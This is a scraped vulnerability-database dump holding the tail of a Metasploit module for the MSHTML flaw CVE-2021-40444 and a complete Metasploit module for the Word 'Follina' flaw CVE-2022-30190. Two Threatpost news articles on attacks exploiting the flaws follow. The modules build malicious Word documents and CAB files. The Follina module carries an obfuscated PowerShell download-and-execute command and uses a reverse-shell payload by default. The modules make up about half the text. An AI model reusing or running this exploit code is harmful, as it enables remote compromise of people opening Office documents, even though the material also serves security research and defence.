checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*') \nelse \nbytes = dword \nend \nend \nchecksum = checksum.reverse \n \ncase (data.length % 4) \nwhen 3 \ndword = \"\\x00#{bytes}\" \nwhen 2 \ndword = \"\\x00\\x00#{bytes}\" \nwhen 1 \ndword = \"\\x00\\x00\\x00#{bytes}\" \nelse \ndword = \"\\x00\\x00\\x00\\x00\" \nend \n \nchecksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse \nend \n \n# http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf \ndef create_cab(data) \ncab_cfdata = '' \nfilename = \"../#{File.basename(@my_resources.first)}.inf\" \nblock_size = 32768 \nstruct_cffile = 0xd \nstruct_cfheader = 0x30 \n \nblock_counter = 0 \ndata.chars.each_slice(block_size).map(&:join).each do |block| \nblock_counter += 1 \n \nseed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\" \ncsum = cab_checksum(block, seed) \n \nvprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\") \ncab_cfdata << csum # uint32 {4} - Checksum \ncab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length \ncab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length \ncab_cfdata << block \nend \n \ncab_size = [ \nstruct_cfheader + \nstruct_cffile + \nfilename.length + \ncab_cfdata.length \n].pack('L<') \n \n# CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB) \ncab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF) \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \ncab_header << cab_size # uint32 {4} - Archive Length \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \n \ncab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null) \ncab_header << \"\\x03\" # byte {1} - Minor Version (3) \ncab_header << \"\\x01\" # byte {1} - Major Version (1) \ncab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders \ncab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files \ncab_header << \"\\x00\\x00\" # uint16 {2} - Flags \n \ncab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number \ncab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set \n \n# CFFOLDER \ncab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder \nstruct_cfheader + \nstruct_cffile + \nfilename.length \n].pack('L<') \ncab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder \ncab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP) \n \n# increase file size to trigger vulnerability \ncab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\") \ndata.length + 1073741824 \n].pack('L<') \n \n# set current date and time in the format of cab file \ndate_time = Time.new \ndate = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S') \ntime = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S') \n \n# CFFILE \ncab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder) \ncab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0) \ncab_header << date # uint16 {2} - File Date (\\x5A\\x53) \ncab_header << time # uint16 {2} - File Time (\\xC3\\x5C) \ncab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes \ncab_header << filename # byte {X} - Filename (ASCII) \ncab_header << \"\\x00\" # byte {1} - null Filename Terminator \n \ncab_stream = cab_header \n \n# CFDATA \ncab_stream << cab_cfdata \nend \n \ndef generate_html \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\" \ninf = \"#{File.basename(@my_resources.first)}.inf\" \n \nfile_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js') \njs_content = ::File.binread(file_path) \n \njs_content.gsub!('REPLACE_INF', inf) \njs_content.gsub!('REPLACE_URI', uri) \nif datastore['OBFUSCATE'] \nprint_status('Obfuscate JavaScript content') \n \njs_content = Rex::Exploitation::JSObfu.new js_content \njs_content = js_content.obfuscate(memory_sensitive: false) \nend \n \nhtml = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>' \nhtml += js_content.to_s \nhtml += '</script></body></html>' \nhtml \nend \n \ndef get_file_in_docx(fname) \ni = @docx.find_index { |item| item[:fname] == fname } \n \nunless i \nfail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\") \nend \n \n@docx.fetch(i)[:data] \nend \n \ndef get_template_path \ndatastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx') \nend \n \ndef inject_docx \ndocument_xml = get_file_in_docx('word/document.xml') \nunless document_xml \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml') \nend \n \ndocument_xml_rels = get_file_in_docx('word/_rels/document.xml.rels') \nunless document_xml_rels \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels') \nend \n \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\" \n@docx.each do |entry| \ncase entry[:fname] \nwhen 'word/document.xml' \nentry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s) \nwhen 'word/_rels/document.xml.rels' \nentry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\") \nend \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * '/' \n \nnew_str = new_str.gsub!('//', '/') while new_str.index('//') \n \n# makes sure there's a starting slash \nunless new_str[0, 1] == '/' \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef on_request_uri(cli, request) \nheader_cab = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'application/octet-stream', \n'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\" \n} \n \nheader_html = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'text/html; charset=UTF-8' \n} \n \nif request.method.eql? 'HEAD' \nif request.raw_uri.to_s.end_with? '.cab' \nsend_response(cli, '', header_cab) \nelse \nsend_response(cli, '', header_html) \nend \nelsif request.method.eql? 'OPTIONS' \nresponse = create_response(501, 'Unsupported Method') \nresponse['Content-Type'] = 'text/html' \nresponse.body = '' \n \ncli.send_response(response) \nelsif request.raw_uri.to_s.end_with? '.html' \nprint_status('Sending HTML Payload') \n \nsend_response_html(cli, generate_html, header_html) \nelsif request.raw_uri.to_s.end_with? '.cab' \nprint_status('Sending CAB Payload') \n \nsend_response(cli, create_cab(@dll_payload), header_cab) \nend \nend \n \ndef pack_docx \n@docx.each do |entry| \nif entry[:data].is_a?(Nokogiri::XML::Document) \nentry[:data] = entry[:data].to_s \nend \nend \n \nMsf::Util::EXE.to_zip(@docx) \nend \n \ndef unpack_docx(template_path) \ndocument = [] \n \nZip::File.open(template_path) do |entries| \nentries.each do |entry| \nif entry.name.match(/\\.xml|\\.rels$/i) \ncontent = Nokogiri::XML(entry.get_input_stream.read) if entry.file? \nelsif entry.file? \ncontent = entry.get_input_stream.read \nend \n \nvprint_status(\"Parsing item from template: #{entry.name}\") \n \ndocument << { fname: entry.name, data: content } \nend \nend \n \ndocument \nend \n \ndef primer \nprint_status('CVE-2021-40444: Generate a malicious docx file') \n \n@proto = (datastore['SSL'] ? 'https' : 'http') \nif datastore['SRVHOST'] == '0.0.0.0' \ndatastore['SRVHOST'] = Rex::Socket.source_address \nend \n \ntemplate_path = get_template_path \nunless File.extname(template_path).match(/\\.docx$/i) \nfail_with(Failure::BadConfig, 'Template is not a docx file!') \nend \n \nprint_status(\"Using template '#{template_path}'\") \n@docx = unpack_docx(template_path) \n \nprint_status('Injecting payload in docx document') \ninject_docx \n \nprint_status(\"Finalizing docx '#{datastore['FILENAME']}'\") \nfile_create(pack_docx) \n \n@dll_payload = Msf::Util::EXE.to_win64pe_dll( \nframework, \npayload.encoded, \n{ \narch: payload.arch.first, \nmixed_mode: true, \nplatform: 'win' \n} \n) \nend \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165214/word_mshtml_rce.rb.txt"}, {"lastseen": "2022-06-07T16:53:04", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "packetstorm", "title": "Microsoft Office Word MSDTJS Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T00:00:00", "id": "PACKETSTORM:167438", "href": "https://packetstormsecurity.com/files/167438/Microsoft-Office-Word-MSDTJS-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Office Word MSDTJS', \n'Description' => %q{ \nThis module generates a malicious Microsoft Word document that when loaded, will leverage the remote template \nfeature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code. \n}, \n'References' => [ \n['CVE', '2022-30190'], \n['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'], \n['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'], \n['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'], \n['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'], \n['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'], \n['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190'] \n], \n'Author' => [ \n'nao sec', # Original disclosure. \n'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop CyberSecurity \n], \n'DisclosureDate' => '2022-05-29', \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Payload' => { \n'DisableNops' => true \n}, \n'DefaultOptions' => { \n'DisablePayloadHandler' => false, \n'FILENAME' => 'msf.docx', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'SRVHOST' => Rex::Socket.source_address('1.2.3.4') \n}, \n'Targets' => [ \n[ 'Microsoft Office Word', {} ] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Follina'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']), \nOptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) \n]) \nend \n \ndef get_file_in_docx(fname) \ni = @docx.find_index { |item| item[:fname] == fname } \n \nunless i \nfail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\") \nend \n \n@docx.fetch(i)[:data] \nend \n \ndef get_template_path \ndatastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx') \nend \n \ndef generate_html \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1\" \n \ndummy = '' \n(1..random_int(61, 100)).each do |_n| \ndummy += '//' + rand_text_alpha(100) + \"\\n\" \nend \n \ncmd = Rex::Text.encode_base64(\"IEX(New-Object Net.WebClient).downloadString('#{uri}')\") \n \njs_content = \"window.location.href = \\\"ms-msdt:/id PCWDiagnostic /skip force /param \\\\\\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\\\\\"\\\";\" \nif datastore['OBFUSCATE'] \nprint_status('Obfuscate JavaScript content') \n \njs_content = Rex::Exploitation::JSObfu.new js_content \njs_content = js_content.obfuscate(memory_sensitive: false) \nend \n \nhtml = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>' \nhtml += \"\\n#{dummy}\\n#{js_content}\\n\" \nhtml += '</script></body></html>' \n \nhtml \nend \n \ndef inject_docx \ndocument_xml = get_file_in_docx('word/document.xml') \nunless document_xml \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml') \nend \n \ndocument_xml_rels = get_file_in_docx('word/_rels/document.xml.rels') \nunless document_xml_rels \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels') \nend \n \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\" \n@docx.each do |entry| \ncase entry[:fname] \nwhen 'word/_rels/document.xml.rels' \nentry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"#{uri}&#x21;\") \nend \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * '/' \n \nnew_str = new_str.gsub!('//', '/') while new_str.index('//') \n \n# makes sure there's a starting slash \nunless new_str.start_with?('/') \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef on_request_uri(cli, request) \nheader_html = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'text/html; charset=UTF-8' \n} \n \nif request.method.eql? 'HEAD' \nsend_response(cli, '', header_html) \nelsif request.method.eql? 'OPTIONS' \nresponse = create_response(501, 'Unsupported Method') \nresponse['Content-Type'] = 'text/html' \nresponse.body = '' \n \ncli.send_response(response) \nelsif request.raw_uri.to_s.end_with? '.html' \nprint_status('Sending HTML Payload') \n \nsend_response_html(cli, generate_html, header_html) \nelsif request.raw_uri.to_s.end_with? '.ps1' \nprint_status('Sending PowerShell Payload') \n \nsend_response(cli, @payload_data, header_html) \nend \nend \n \ndef pack_docx \n@docx.each do |entry| \nif entry[:data].is_a?(Nokogiri::XML::Document) \nentry[:data] = entry[:data].to_s \nend \nend \n \nMsf::Util::EXE.to_zip(@docx) \nend \n \ndef primer \nprint_status('Generating a malicious docx file') \n \n@proto = (datastore['SSL'] ? 'https' : 'http') \n \ntemplate_path = get_template_path \nunless File.extname(template_path).downcase.end_with?('.docx') \nfail_with(Failure::BadConfig, 'Template is not a docx file!') \nend \n \nprint_status(\"Using template '#{template_path}'\") \n@docx = unpack_docx(template_path) \n \nprint_status('Injecting payload in docx document') \ninject_docx \n \nprint_status(\"Finalizing docx '#{datastore['FILENAME']}'\") \nfile_create(pack_docx) \n \n@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true) \n \nsuper \nend \n \ndef random_int(min, max) \nrand(max - min) + min \nend \n \ndef unpack_docx(template_path) \ndocument = [] \n \nZip::File.open(template_path) do |entries| \nentries.each do |entry| \nif entry.name.downcase.end_with?('.xml', '.rels') \ncontent = Nokogiri::XML(entry.get_input_stream.read) if entry.file? \nelsif entry.file? \ncontent = entry.get_input_stream.read \nend \n \nvprint_status(\"Parsing item from template: #{entry.name}\") \n \ndocument << { fname: entry.name, data: content } \nend \nend \n \ndocument \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167438/word_msdtjs_rce.rb.txt"}], "threatpost": [{"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote control execution (RCE) flaw, tracked as [CVE-2022-3019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>)\u2014with attackers apparently targeting Russian users\u2013and reported to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who[ tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c:**Command Prompt**** as Administrator****\u201c**; Back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which are common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>)**, **tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. He said the workaround is\u201dnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the 